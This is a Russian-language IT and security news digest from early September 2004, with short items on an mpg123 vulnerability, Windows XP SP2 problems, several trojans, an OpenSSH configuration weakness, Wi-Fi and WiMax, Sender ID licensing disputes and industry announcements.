Davide Del Vecchio сообщает об уязвимости в популярном в мире открытых систем консольном плеере аудио-файлов mpg123. Mpg123 позволяет проигрывать аудио-файлы как локальные (имя в качестве парамметра, либо стандартный вход, если в качестве имени указан символ "-"), так и удалённые (в качестве имени файла задаётся URL). Автор уязвимости обнаружил, что существует возможность сформировать такой mp3/2 - файл, при попытке проигрывания которого из-за некорректной обработки заголовка может возникнуть ситуация выполнения произвольного кода от имени пользователя, запустившего mpg123. Автор плеера никак не отреагировал на сообщение об ошибке, однако один из разработчиков Debian, Daniel Kobras, выпустил соответствующий патч. Как видно из кода патча, уязвимость существует в коде layer2.c. Уязвимость присутствует в версиях mpg123-0.59r и, возможно, mpg123-0.59s. Проверялась в ОС Linux Debian SID и OpenBSD.
Описание

8/09/2004 11:03 Microsoft продлевает период тестирования SP2 для Windows ХР
Корпорация Microsoft продлила период тестирования второго пакета обновлений для операционной системы Windows ХР. Этот сервис-пак, выпущенный в начале августа, призван, как известно, повысить уровень защиты компьютеров при работе в интернете. Однако многие пользователи, установившие апдейт, столкнулись с проблемами несовместимости пакета обновлений с прикладными приложениями. Позднее были выявлены ошибки, возникающие на машинах с 64-разрядными процессорами Athlon 64 и Opteron производства AMD, а также обнаружены несколько дыр. В результате, некоторые компании, например IBM, полностью отказались от инсталляции апдейта до выявления всех возможных рисков. Софтверный гигант, осознавая желание клиентов протестировать сервис-пак, около месяца назад выпустил специализированную утилиту, блокирующую загрузку апдейта через службу автоматических обновлений. Эта утилита устанавливала в реестре ключ, предотвращающий инсталляцию сервис-пака в течение 120 дней. Однако, как теперь передает Infoworld, период тестирования был продлен вдвое - до 240 дней. До 11 апреля включительно службы Automatic Updates и Windows Update не будут загружать пакет обновлений на компьютеры с активированным защитным ключом. Начиная с 12 апреля все подключенные к Сети пользователи лицензионных копий Windows ХР получат сервис-пак автоматически (прим. ньюсмейкера - если к тому времени не возникнет необходимость в выпуске SP3).
Подробности

8/09/2004 10:40 ГАС "Выборы" адаптирована под Интернет
Компания "АНД Проджект" объявила о сдаче в промышленную эксплуатацию двух подсистем Государственной автоматизированной системы "Выборы" - "Интернет-портал" и "Информационно-справочная подсистема" ЦИК России". Заказчиком в обеих случаях выступил Федеральный центр информатизации при ЦИК России. "Интернет-Портал" разработан на основе системы управления веб-ориентированными приложениями SiTex от "АНД Проджект". Проект обеспечивает управление связанными в единое информационное пространство сайтом ЦИК России и сайтами 89 избирательных комиссий. "Информационно-справочная подсистема" - корпоративный портал ЦИК России, через который сотрудники комиссии могут получить персонализированный доступ к информационному фонду ГАС "Выборы".
Internet.Ru

8/09/2004 10:16 Intel изобрела дальнобойное Wi-Fi
Компания Intel разработала новый способ беспроводной передачи данных, позволяющий подключаться к Интернету через радиоэфир на значительном расстоянии, сообщает агентство Bloomberg News. По данным агентства, разработка Intel получила название WiMax и в настоящее время проходит тестирование. Окончательную версию оборудования, работающего по этой технологии, компания обещает представить через год, и к 2006 году его планируется встраиваться в ноутбуки, а к 2007 - в мобильные телефоны. Подробности в Intel уточнять отказываются, ссылаясь на коммерческую тайну. Сообщается лишь, что от существующего стандарта WiFi, позволяющего без проводов подключаться к Интернету на высокой скорости на небольшом расстоянии в пределах различных помещений и GPRS, позволяющего подключаться на больших расстояниях, но на низкой скорости, WiMax отличается дальностью связи: с его помощью можно будет производить высокоскоростное подключение в пределах городских кварталов и населенных пунктов в сельской местности.
Lenta.Ru

8/09/2004 09:54 Математики стоят на пороге уничтожения криптографии
Подтверждение гипотезы Римана, к которой близко подошли математики, может уничтожить все достижения современной криптографии, что будет иметь весьма негативное влияние на интернет-коммерцию, сообщает SecurityLab.ru. Математик из США французского происхождения Луис де Бранже (Louis de Branges) заявил, что он имеет доказательства гипотезы Римана. Гипотеза Георга Фридриха Бернарда Римана была сформулирована 150 лет назад. Она касается случайных наборов простых чисел, которые являются основой систем шифрования, применяемых в интернете. Данная гипотеза была признана одной из 7 важнейших научных проблем тысячелетия. Институт математики Clay в США предложил $1 млн. за подтверждение или опровержение гипотезы Римана. Однако не все коллеги де Бранже согласны с тем, что он имеет корректное и четкое решение. По утверждению профессора Оксфордского университета Маркуса ду Сатойя (Marcus du Sautoy), решение проблем теории Римана позволило бы лучше понимать "поведение" простых чисел и предсказывать его, что привело бы к полной невозможности обеспечивать безопасность электронных транзакций с помощью шифрования.
Vnunet

7/09/2004 14:53 Выходит Apache Portable Runtime 1.0
Вышла первая официальная версия Apache Portable Runtime (APR) 1.0.0. Проект APR нацелен на предоставление программного интерфейса (API), работая с которым, разработчики программного обеспечения могут быть уверены в предстказуемом поведении некоторых неоднозначных операций, которые могут вести себя по разному на разных платформах. Центральные подсистемы APR 1.0 включают атомарные операции, загрузка динамически связанных объектов, файловый ввод/вывод, ключи (семафоры, переменные условий и др.), отображаемые на память файлы, сетевой ввод/вывод, совместно используемая память, нити и управление процессами, различные структуры данных (таблицы, хэши, приоритетные очереди и другие).
Сайт проекта

7/09/2004 14:36 Программа поможет настроить VoIP
Компания Netcordia добавила к своему сетевому диагностическому инструменту NetMRI программный модуль анализа работы VoIP. Теперь NetMRI позволяет в реальном времени оценить качество обслуживания (QoS) и помочь с обнаружением проблемных мест в программно-аппаратном комплексе сети, пишет TMCnet. Теперь NetMRI может в автоматическом режиме обнаружить причину снижения качества обслуживания и внести необходимые изменения в настройки программного обеспечения. При этом учитывается состояние сети и влияние работы других служб. Решение также может давать оценку возможности использования конкретной сети для передачи голосового трафика.
Nag.Ru

7/09/2004 12:16 Выход Firefox 1.0 задерживается
Участники сообщества разработчиков Mozilla.org приняли решение отложить выпуск окончательной версии браузера Mozilla Firefox. В настоящее время доступна предварительная версия этого браузера с индексом 0.9.3. Версию 1.0 планировалось выпустить в сентябре, однако к намеченному сроку — 14 сентября успеть не удалось, и график выпуска Mozilla Firefox подвергся пересмотру. На 20 сентября намечен выход первого релиз-кандидата. Второй релиз-кандидат увидит свет 4 октября. А финальная версия Firefox 1.0 для Windows и Linux увидит свет на раньше 11 октября. Версия для «Макинтошей» увидит свет несколько позднее. Не исключены и дальнейшие задержки — разработчики хотят выпустить максимально отлаженный и стабильный продукт. Кстати, окончательный продукт, скорее всего не будет иметь номера версии и будет называться Mozilla Firefox или просто Firefox.
"Компьюлента"

7/09/2004 11:48 Беспроводные мосты 3Com
3Com анонсировала выпуск беспроводных мостов для локальных сетей, значительно повышающих производительность предлагаемых в настоящее время продуктов компании. Эти мосты, выполненные в соответствии с требованиями стандарта 802.11g, обеспечивают передачу данных между зданиями, удаленными друг от друга на дистанцию до восьми миль, с быстродействием (в зависимости от расстояния) 20 или 25 Мбит/с. По мнению специалистов компании, новые беспроводные радиомосты могут использоваться в широкополосных соединениях вместо линий T-1 или волоконно-оптических каналов связи. Позднее в этом месяце будут представлены две их модификации. Одна из них, предназначенная для внешнего монтажа, содержит в своем корпусе антенну (18-dBi), радиосистему 802.11g, источник питания и другие электронные блоки, необходимые для ее работы. В другой модели, которая устанавливается внутри супермаркетов или складских помещений, предусмотрено использование панельных или однонаправленных антенн с различными коэффициентами усиления. При проектировании мостов специалисты 3Com увеличили производительность обработки информации, необходимой для реализации технологии Wi-Fi Protected Access, а также использования Advanced Encryption System. Среди новых функций - поддержка спецификации Wireless Distribution System (WDS), являющейся частью стандарта 802.11. Применение WDS предоставляет возможность устройствам радиосетей взаимодействовать в режиме мостов и репитеров.
"Открытые системы"

7/09/2004 11:03 Database File System для Linux
В то время, пока Microsoft думает, включить ли WinFS в состав Windows Longhorn или не откладывать выпуск новой версии ОС до конца эры персональных компьютеров, пользователи Linux уже имеют возможность насладиться реально работающей, пусть и не завершенной, реализацией "технологии будущего", сообщает linuxcenter.ru. Онне Гортер (Onne Gorter) разработал один из вариантов Database Filesystem (DBFS), который встраивается в среду KDE. DBFS Гортера создает дополнительный уровень абстракции над файловой системой и заменяет стандартные диалоги открытия и сохранения файла KDE своими. В комплект поставки входит специализированный файловый менеджер KDBFS. Разработка данной системы была выполнена в рамках магистерской диссертации г-на Гортера и в настоящий момент опубликована по GPL. В будущем планируется интеграция DBFS с GNOME и даже создание на их базе рабочего стола нового типа.
Сайт проекта

7/09/2004 10:41 Онлайн-книга по системному программированию в FreeBSD
Под лицензией GNU выпущена онлайн-книга, посвящённая системному программированию в ОС FreeBSD. Авторами книги являются - Nathan Boeger и Mana Tominaga. Книга состоит из 8 частей, в которых описываются - структура и описание утилиты make, процесс загрузки ОС FreeBSD, процессы и сервисы ядра, сигналы и управление процессами, описание базовой и расширенной подсистемы ввода-вывода, ресурсы процессов и системные лимиты. Отдельная глава посвящена новой ветви FreeBSD - 5. В приложении приведены исходные коды всех программ, упоминаемых в книге.
Книга

7/09/2004 10:24 Apple: «Мы на годы опережаем Longhorn»
Apple Computer надеется, что open-source родословная Tiger убережет пятую версию операционной системы от проблем безопасности, которые докучают Microsoft. Новая версия операционной системы Apple должна дебютировать в первом полугодии 2005 года, и руководители компании уверяют, что в силу своей open-source природы этот продукт будет более безопасным, чем «некоторые проприетарные предложения». Операционная система, впервые выпущенная в марте 2001 года, опирается на платформу Unix. Старший вице-президент Apple по программному обеспечению Бертранд Серлет убежден, что чем больше людей могут видеть исходный код, тем выше уровень безопасности ПО. В прошлом у Mac OS были пробелы в защите, хотя и не так много, как в конкурирующей Microsoft Windows. Ранние версии Tiger уже существуют. В июне Apple передала одну версию разработчикам с тем, чтобы они могли начать создание приложений. Старший директор Apple по маркетингу Mac OS X Кен Березкин назвал эту версию «добротной копией» Tiger. Однако Серлет признает, что над продуктом предстоит еще много поработать. Например, компания еще не закончила оформление стандартных «виджетов» — часов, блокнота, словаря и других привычных принадлежностей, которые можно класть на рабочий стол в полупрозрачном слое. Тем не менее, руководители Apple, по словам Березкина, «абсолютно уверены», что у компании не будет таких проблем со сроками выпуска операционной системы, как у Microsoft. Производитель Мас не скрывает своей уверенности в том, что Microsoft заимствует идеи из предыдущих операционных систем Apple. Когда СЕО Apple Стив Джобс демонстрировал Tiger в конце июня, конференц-зал был обклеен плакатами: «Редмонд, включай свою копировальную технику». Березкин сказал в адрес Microsoft: «Приятно, что они так пристально нас изучают». На вопрос о том, ожидает ли Apple увидеть в Longhorn MS Widget, он ответил: «Мы законодатели мод в сфере удобств для пользователей, и нас копируют очень многие».
ZDNet

7/09/2004 09:52 Улучшения в сетевом стеке FreeBSD 5.3
Один из разработчиков ядра FreeBSD Andre Oppermann представил широкой общественности улучшения, которые предполагается сделать в сетевом стеке ОС FreeBSD версии 5.3. В PDF-документе все новшества сведены к следующим: изменения в работе с таблицами маршрутизации, изменения в работе с интерфейсами, изменения в работе с протоколом IPv4, изменения в механизме фильтрации, изменения в работе TCP, поддержка новых сетевых стеков (Bluetooth на основе Netgraph, ATM на основе Netgraph).
Документ

6/09/2004 20:08 Правительство США рекомендует установить сервис-пак к Windows XP
Организация US-CERT, созданная при участии Министерства внутренней безопасности США для предупреждения кибератак опубликовала собственные рекомендации, касающиеся второго сервис-пака для операционной системы Windows XP. В рекомендации отмечается, что сервис-пак значительно повышает безопасность системы и поэтому установить обновление крайне желательно. В рекомендации дается характеристика наиболее важным нововведениям, связанным с безопасностью. Это усовершенствованный брандмауэр, новые настройки безопасности Internet Explorer и Outlook Express, Центр безопасности и улучшенная система автоматических обновлений, а также поддержка технологии No Execute. Вместе с тем, из-за того, что сервис-пак вносит значительные изменения в настройки операционной системы, некоторые программы могут испытывать проблемы после установки сервис-пака. Поэтому в CERT рекомендуют отнестись к установке обновления максимально серьезно и сделать резервные копии всех важных данных.
"Компьюлента"

6/09/2004 15:20 Троян Balkart превращает компьютер в FTP-сервер
Компания Symantec сообщает об обнаружении вредоносной программы Balkart ("Компьюлента"). После проникновения на компьютер с Windows и активации троян Balkart записывает собственную копию в директорию операционной системы под именем ÎäÒíÑ.exe (на арабском языке) и добавляет ссылку на этот файл в ключ автозапуска реестра. Далее троян открывает "черный ход" в систему на ТСР-порте 12121. Злоумышленники могут использовать вредоносную программу для выполнения каких-либо команд на инфицированной машине или завершения запущенных процессов. Кроме того, Balkart позволяет превратить зараженный компьютер в FTP-сервер. Широкого распространения троян пока не получил.
Описание

6/09/2004 15:14 Мобильное позиционирование: скоро и в МТС
Система определения местоположения абонента (АОП) доступна абонентам московской сети МегаФон уже полгода, теперь нечто аналогичное будет запущено в тестовую эксплуатацию в сети МТС предположительно в четвертом квартале этого года. Оборудование и программное обеспечение системы еще доводят и настраивают, однако многие сервисы уже функционируют. Ребятам из mobile-review.com удалось зарегистрироваться в системе, "покрутить" меню/команды и оценить удобство и функциональные возможности. Своими впечатлениями и оценками они и поделились в специально выпущенной статье. Представители МТС твердо обещали бесплатную тестовую бесплатную эксплуатацию услуги в течение определенного периода времени, так что будет возможность все попробовать и оценить точность определения координат в разных условиях.
Cтатья

6/09/2004 14:26 В России появился новый вид мобильного мошенничества
Любого пользователя мобильной связи заинтересует предложение купить "модный" телефон всего за 500 рублей. На стремление отечественного гражданина к "халяве" как раз и рассчитывают разработчики нового вида онлайнового мошенничества. Среди предлагаемых на сайте моделей фигурируют такие популярные телефоны как Nokia 6230, 7200, 6610i, Samsung D410, SonyEricsson T610, T630. После внесения денежного взноса в размере 500 рублей, имя участника пирамиды будет занесено в так называемую "матрицу вступивших". После ее заполнения (от 20 до 30 человек) имя автоматически перенесется в "матрицу получателей". Второй список еще больше первого, - пока не известно, осчастливила ли пирамида кого-нибудь из ее участников, сообщает Internet.Ru.
Сайт "сотовый за 500 рублей"

6/09/2004 13:54 CERT: 78% финансовых преступлений совершаются авторизованными пользователями
Агентство US Secret Services и организация CERT, специализирующаяся в области информационной безопасности, заявили о необходимости усиления защиты от авторизованных пользователей. Основанием этому послужили результаты двухлетнего исследования финансовых преступлений. Анализируя финансовые преступления, совершенные с 1996 по 2002 гг., в результате которых терялись суммы до $691 млн., US Secret Services и CERT пришли к выводу, что 78% всех краж приходились на долю авторизованных пользователей, имеющих в среднем слабую техническую подготовку. Хотя банки вкладывают огромные средства в сложные системы детекции вторжений, большинство авторизованных преступников обнаруживаются прозаическими способами, например, по жалобам клиентов или результатам неавтоматизированных проверок финансовых документов. Так, по жалобам клиентов удалось раскрыть мошенников в 35% случаев. Авторы расследования считают, что инструментарий обнаружения недобросовестных инсайдеров дорог и в достаточной степени бессилен. "Похоже, что обнаружение и оценка такого рода инцидентов, по-прежнему не может обойтись без ручной диагностики и анализа", - заключают авторы доклада. Фирмы должны сосредоточиться на защите паролей, а также записей в журналах использования приложений. Также необходимо создать такие условия, при которых модификация критичных данных требовала бы присутствия как минимум двоих сотрудников. Еще один фактор риска - удаленные рабочие места. Специалисты CERT рекомендуют открывать доступ к важной информации только для сотрудников, находящихся внутри здания компании. На долю ИТ-персонала приходилось менее четверти инцидентов. Почти 50% преступлений были совершены с использованием своего собственного логина и пароля.
CNews

6/09/2004 13:39 Windows SP2 конфликтует со шпионским ПО
Корпорация Microsoft предупредила пользователей Windows XP о риске установки Service Pack 2 (SP2), если компьютер не проверен на наличие шпионского ПО. Перед установкой обновления рекомендуется удалить все шпионские программы. В противном случае может возникнуть полный оказ системы. Специалисты HL сообщили о том, что им известно о нескольких таких случаях. Пока неизвестно, какое конкретно шпионское ПО вызывает данный конфликт. Microsoft советует внимательно отнестись к выбору средства удаления; неопытным пользователям рекомендуется обратиться к специалисту.
CNews

6/09/2004 12:59 Еженедельный отчёт о вирусах от Panda Software
Panda Software выпущен традиционный еженедельный отчёт о вирусной активности прошедшей недели. В отчёте рассмотрены четыре вредоносных объекта: Bagle.AY, Bagle.AW, Bagle.AV и CodeBase.gen.
Отчёт

6/09/2004 12:55 SP2 против плагинов
Если секьюрити-эксперты приветствуют Microsoft Service Pack 2, то некоторые компании, распространяющие собственное ПО через веб, настороженно следят за выпуском продукта. Годами разработчики ПО предлагали миру свои приложения для веб-браузера Microsoft Internet Explorer через мощный проприетарный API компании, называемый ActiveX. Эта технология запускает внешние приложения, или «плагины», внутри веб-страницы. Однако инструмент, который хорошо исполняет программы в браузере, способен выполнять и злонамеренное ПО, в результате чего ActiveX оказался замешан во многих схемах нарушения защиты, в том числе и тайной установки adware, spyware и прочей нечисти. Service Pack 2 подрезал ActiveX крылья, усилив систему предупреждения, которая вступает в действие при попытке веб-сайта исполнить элемент ActiveX, открыть всплывающее окно или выполнить другой код. В прошлом IE, прежде чем позволить установить плагин, предлагал пользователям в окне предупреждения простые варианты выбора Yes или No. В SP2 Microsoft по умолчанию блокирует элементы управления ActiveX и выводит грозное предостережение о том, что неизвестное ПО способно повредить ПК, и что разрешение инсталляции может привести к непредсказуемым последствиям. Эти перемены встревожили производителей ПО, которые опираются на ActiveX, и вызвали подозрения в использовании Microsoft необходимости усиления мер безопасности для достижения собственных стратегических целей. «Мы с замиранием сердца ожидаем, когда все его установят, — говорит Алекс Сент-Джон, участвовавший в создании графического ПО Microsoft для DirectX в свою бытность сотрудником компании с 1992 по 1997, а теперь владелец сайта 3D-игр WildTangent. — Скорее всего, предупреждение SP2 встревожит и насторожит пользователя, и он вообще все отменит. А большой процент людей сначала просто не поймет, что произошло… Это нарушает все бизнес-модели, связанные с возможностью воспроизводить контент в браузере».
Подробности

6/09/2004 12:53 ПО организации мультимедиа-сетей
Специалисты Института имени Фраунгофера и отделившейся от него фирмы TwonkyVision разработали программное обеспечение промежуточного слоя на базе стандарта Universal Plug and Play (UPnP), обеспечивающее возможность соединения устройств различных производителей и организации обмена между ними цифровым аудио- и видеосодержанием. Данный продукт, получивший название UPnP AV Stack, можно свободно загрузить с сайта TwonkyVision. Комплект средств разработки приложений на базе UPnP, который в дальнейшем планируется выпустить, будет платным. ПО разработано в версиях для Windows и Linux. На презентации системы представители института продемонстрировали выполненную с ее использованием мультимедиа-сеть. Была показана возможность обмена аудио- и видеосодержанием между устройствами производства компаний Philips, Linksys Group, Netgear и Sony. Как пояснили специалисты TwonkyVision, UPnP AV Stack позволяет воспроизводить на любом сетевом устройстве соответствующего назначения фотографии, видео и музыку, хранимые на любом другом, соединенным с первым IP-сетью. Стандартизация UPnP координируется ассоциацией UPnP Forum, участником которой является институт Фраунгофера.
"Открытые системы"

6/09/2004 12:42 Обнаружен троян Glieder
Как сообщает "Лаборатория Касперского", ей обнаружен новый троян, получивший название Trojan.Win32.Glieder.gen. Предназначена для скрытного скачивания и запуска на компьютере пользователя других вредоносных программ. Состоит из двух компонентов (файлов), первый из которых при запуске копирует себя в системный каталог Windows и регистрируется в ключах автозапуска системного реестра: [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run], [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]. Затем происходит сохранение в системном каталоге Windows второго компонента "троянца" и внедрение его в процесс "explorer.exe". В дальнейшем все действия выполняются от имени этого процесса: отключение Windows Firewall; блокировка обновления баз для некоторых антивирусных программ; загрузка с большого количества сайтов (список которых "зашит" в коде "троянца") вредоносных программ и запуск их на заражённом компьютере.
"Лаборатория Касперского"

5/09/2004 14:37 Слабая конфигурация по умолчанию в OpenSSH
Уязвимость в конфигурации по умолчанию обнаружена в OpenSSH, когда используется с анонимными публичными службами, типа анонимным CVS. Удаленный пользователь может подключится к произвольным хостам через целевую службу. 'AllowTcpForwarding' в конфигурации по умолчанию разрешает перенаправление TCP подключений. На сайтах, которые позволяют анонимному пользователю получать доступ к службе через SSH, удаленный пользователь может выполнить port bouncing нападение. Удаленный авторизованный пользователь может заставить целевую службу подключится к произвольным портам на произвольных серверах. В качестве решеения рекомендуется в файл '/etc/ssh/sshd_config' добавить строку: AllowTcpForwarding no.
Описание

5/09/2004 12:24 Банки будут отчитываться о своих веб-сайтах
С 3 сентября все российские банки должны отчитываться перед ЦБ об использовании интернет-технологий в своей деятельности, сообщает "Компьюлента". Они должны сообщать об открытии или закрытии веб-сайта, об изменении его функциональных возможностей, об использовании интернет-банкинга и т.д. 1 сентября вступило в силу указание ЦБ РФ №1481-У. В соответствии с ним вводится новая форма отчетности 0409070, она называется «Сведения об использовании кредитной организацией интернет-технологий». При малейшей активности в интернете банки теперь будут обязаны отчитываться перед государством. Порядок составления новой формы, а также образец заполнения и инструкции опубликованы в специальном указании ЦБ. Если банк открывает сайт или меняет его адрес, или меняет функциональность, или прекращает его обслуживание, он должен в течение двух недель сообщить об этом государству. В случае ведения нескольких сайтов отдельный отчет нужно предоставлять по каждому из них. При этом требуется сообщить множество дополнительных сведений (таких, как: адрес(а) (URL или IP) веб-сайта, функциональное назначение веб-сайта, наличие документа, определяющего порядок использования веб-сайта, место нахождения используемого веб-сайта, наличие договора с владельцем веб-сервера, наличие договора с организацией, оказывающей услуги по доступу в интернет, наличие документа, определяющего порядок предоставления услуг интернет-банкинга и т.д.).
Полный текст документа

5/09/2004 12:16 Группа разработки Wi-Fi предлагает новый стандарт безопасности
Альянс, занимающийся разработкой беспроводного стандарта Wi-Fi, объявил о доступности нового стандарта безопасности под названием WPA2, который предназначен для усиления криптозащищённости стандарта Wired Equivalent Privacy (WEP), который довольно легко взламывали хакеры. В состав WPA2 включён стандарт Advanced Encryption Standard, который поддерживает шифрование с длиной ключа 128, 192 и 256-бит. Кроме того, как отмечается в пресс-релизе альянса, WPA2 обратно совместим с WPA, поэтому компании, которые его используют могут свобоно проапгрейдить свои системы.
News.com

5/09/2004 11:30 Ещё один производитель заявил об отказе поддержки Sender ID
Вслед за Apache Software Foundation заявила о своём несогласии с поддержкой Sender ID компания - производитель Linux-дистрибутива Debian. Debian заявляет о неприятии лицензии Sender ID, предлагаемой Microsoft для реализации средств защиты почтовых серверов от спамеров, поскольку эта лицензия противоречит условиям социального контракта Debian. В результате Debian не может предоставлять в составе операционной системы пакеты поддерживающие Sender ID. На сайте заявлено буквально следующее: "Условия свободного от отчислений владельцу (royalty-free) патента Microsoft на Sender ID являются барьером для любого пакета Debian, который хочет реализовать или поддерживать Sender ID. Мы полагаем, что настоящая лицензия и вытекающие из нее препятствия несовместимы с DFSG, в отличие от других стандартов интернета, которые Debian в состоянии поддерживать. Поэтому, мы не можем реализовать или распространять Sender ID на существующих лицензионных положениях. Напротив, мы вынуждены будем удалять поддержку Sender ID из программ, которые мы распространяем, в соответствии с условиями нашего социального контракта. В значительной мере, наше беспокойство разделяют Apache Software Foundation, Free Software Foundation, а также майнтейнеры Postfix, Exim и Courier. Мы также считаем, что ни одна компания не должна обладать правами интеллектуальной собственности (IPR) на базовые технологии составляющие инфраструктуру интернета."
Подробности

5/09/2004 11:07 Арестован захватчик домена eBay
Немецкая полиция арестовала 19-летнего жителя Хелмштадта, неделю назад захватившего сайт eBay Germany, сообщает bugtraq.ru. Как признался сам захватчик, он просто попробовал заказать изменения в DNS для нескольких популярных доменов типа google.com, web.de, amazon.com. В большинстве случаев, естественно, ничего не произошло, но вот eBay Germany каким-то чудом перевелся.
Подробности

5/09/2004 10:03 Microsoft выпускает новые сервис-паки
В течение последней недели компания Microsoft выпустила пакеты обновлений для нескольких своих продуктов, пишет "Компьюлента". После выхода сервис-паков для Office 2003 и Windows XP настала очередь менее известных продуктов компании. Сначала был выпущены сервис-паки для .Net Framework - компонент Windows, обеспечивающий работу приложений на базе платформы .Net. Для .Net Framework 1.0 вышел уже третий сервис-пак, а для .Net Framework 1.1 пакет обновления является первым. На сайте Microsoft сервис-паки для .Net Framework появились на сайте Microsoft 31 августа. Они были выпущены в версиях для 22 языков. Объем сервис-пака для Net Framework 1.1 составляет около 10,5 Мб. Список реализованных в сервис-паке изменений можно найти на этой странице. Помимо исправления различных ошибок и проблем с безопасностью в сервис-паке улучшена совместимость со вторым сервис-паком для Windows XP. В настоящее время сервис-паки для .Net Framework доступны и через службу Windows Update, где проходят в качестве критических обновлений. Еще два сервис-пака предназначены для продуктов семейства SharePoint. Сервис-пак для SharePoint Services имеет размер 4206 кб. Основное место в сервис-паке занимают нововведения, связанные с повышением стабильности работы соответствующих служб. При разработке пакета обновлений была использована информация о сбоях, поступающая через службу автоматизированной отправке отчетов об ошибках в Microsoft. Похожие по сути нововведение реализованы и в первом сервис-паке для SharePoint Portal Server 2003. Оба обновления выпущены на нескольких языках, включая русский.
Патч для .Net Framework
Сервис-пак для SharePoint Services

4/09/2004 19:55 Захват рассылок: один случай из жизни Subscribe.ru
В начале этой недели ведущие рассылок на сервисе Subscribe.ru получили письмо. В нем говорилось о том, что в связи с техническими проблемами база данных авторов рассылок была утеряна. Послание содержало просьбу выслать регистрационные данные на адрес бесплатной почты на «Яндексе». Само письмо, по словам Ильи Курилина, ведущего проекта Subscribe.ru, пришло с нескольких адресов, заведенных на «Яндексе» и других почтовых бесплатных сервисах. Вообще такие случаи, как пояснил г-на Курилин, происходят довольно часто. Как правило, мотивом злоумышленников является захват данных для распространения спама или желание навредить конкретным авторам. Обычно сообщения о таких действиях приходят в Subscribe от владельцев рассылок, получивших «обманные письма». А администрация компании уже обращается к администраторам почтовых сервисов с просьбой закрыть адреса злоумышленников и к своим клиентам с предупреждением об угрозе. К помощи правоохранительных органов служба Subscribe.ru пока не прибегала. Более подробно о происшествии можно прочитать ниже.
Подробности

4/09/2004 19:33 Сервер агентства "Чеченпресс" атакован хакерами
Как сообщается на сайте "Кавказ-Центра", сервер "Чеченпресса" www.chechenpress.com атакован хакерами (утверждают, что это "кибертеррористы из ФСБ"), в связи с чем "возникли некоторые технические проблемы, которые сейчас решаются". На настоящий момент этот адрес недоступен (выдаётся сообщение "Forbidden You don't have permission to access / on this server"), также, как и почтовые ящики на этом сервере. В свете крайних событий удивления этот факт не вызывает. Кроме того, сообщаем, что зеркало сайта доступно по адресу www.chechenpress.info. Хотелось бы надеятся, что организаторы атаки об этом тоже узнают.
Подробности

4/09/2004 19:11 SPF больше всего пользуются спаммеры
Согласно опубликованному на этой неделе исследованию, Sender Policy Framework (SPF), призванный защитить почту от спама, вовсю используется самими спаммерами, сообщает bugtraq.ru. Забавно, но спам сейчас проходит SPF-проверку на 34% чаще, чем "нормальные" письма. Да, SPF препятствует рассылке писем из фиктивных доменов, но сам по себе справиться со спамом не в состоянии.
Подробности

4/09/2004 18:56 Вирус дня: W32.Beagle.AQ
В Сети появилась очередная версия претерпевшего массу изменений и наделавшего много бед вируса Bagle. Попав на машину потенциальной жертвы, вирус, известный как Bagle.dll.dr и W32.Beagle.AQ, сначала пытается отключить установленные на компьютере антивирусные программы, а затем, если попытка удалась, грузит остальную часть собственного кода со 125 вражеских сайтов. Это в теории. А на практике вирус распространяется с очень большим трудом, поскольку большинство сайтов, на которых размещен его код, просто не работает. По крайней мере, так пишет CNET со ссылкой на экспертов антивирусных компаний McAfee и Symantec. Обе компании оценили вирус как представляющий низкий уровень угрозы. Как правило, вирус прибывает на атакуемый компьютер в виде письма с вложением «foto.zip». Для того чтобы компьютер заразился, получателю письма необходимо открыть файл и запустить находящуюся в нем программу. Если установленная на машине антивирусная программа окажется достаточно древней, чтобы проморгать нарушителя, вирус отключит ее, инсталлирует себя на компьютер и создаст несколько копий своих исходников. Кроме того, если какой-нибудь из находящихся в его списке серверов окажется в рабочем состоянии, вирус загрузит дополнительный набор инструкций и примется рассылать себя по адресной книге, найденной на компьютере жертвы, пропуская лишь адреса, принадлежащие крупным компьютерным корпорациям, включая разработчиков операционных систем на базе Linux и антивирусных компаний. Финальным аккордом станет открытие черного хода, необходимого вирусу для установки и запуска почтового сервера, который впоследствии может быть использован для отправки спама.
Internet.Ru

4/09/2004 18:28 Противостояние Sender ID и открытых технологий
Apache Software Foundation обнародовала открытое письмо с утверждением, что многочисленные ограничения на использование антиспам-технологии Sender ID (гибрид технологий Microsoft Caller ID и Sender Policy Framework (SPF), накладываемые лицензионным соглашением "Microsoft Royalty-Free Sender ID Patent License Agreement", противоречит духу открытых стандартов Интернет и вступают в конфликт с лицензиями открытого ПО. Многие элементы заложенные в Sender ID запатентованы. Таким образом поддержка Sender ID в SpamAssassin и многие другие проекты в ближайшее время включена не будет.
Открытое письмо

4/09/2004 18:07 Google будет платить блоггерам
Компания Google разработала специальную программу «AdSense для блогов». Теперь каждый пользователь Blogger может завести аккаунт в системе, разместить у себя на странице специальную ссылку и получать неплохой доход. К сожалению, русскоязычным блоггерам это ничего не дает.
Раньше Google размещала собственные рекламные объявления во всех блогах, зарегистрированных в принадлежащим ей сервисе Blogger. Сами авторы блогов не получали от этой рекламы ни копейки — вполне обычная ситуация, знакомая пользователям любого российского бесплатного хостинга, который заставляет все сайты крутить баннеры и не желает платить за это ни копейки. Однако несколько дней назад все «гугловские» баннеры исчезли. Каждый пользователь Blogger получил приглашение завести специальный «блоггерский» аккаунт в системе AdSense и зарабатывать деньги! Как показывает опыт первых испытателей, это чрезвычайно выгодное предложение, которое позволит самым посещаемым блогам зарабатывать до $100 в день! Новое расширение программы AdSense — это вполне естественный шаг Google. Два месяца назад эта партнерская программа была расширена на владельцев маленьких сайтов и домашних страничек. А теперь стать партнерами Google могут и блоги. Что и говорить — везет же тем, кто пишет по-английски! Впрочем, нет никаких сомнений, что рано или поздно российский рынок тоже созреет для аналогичных маркетинговых программ. Кто первый из систем контекстной рекламы начнет доходом делиться с блоггерами — тот и захватит рынок. А пока что стоит прислушаться к советам, которые дают преуспевающие блоггеры своим начинающим собратьям. Чтобы заработать много денег на контекстной рекламе, нужно соблюдать следующие простые требования:
1. Сфокусироваться и быть настолько специализированным, насколько это возможно.
2. Писать контент о конкретных продуктах.
3. Не начинать блог только ради денег.
4. Использовать профессиональный шаблон дизайна.
Вэбпланета

4/09/2004 17:43 Российская "забастовка мобильников" не удалась
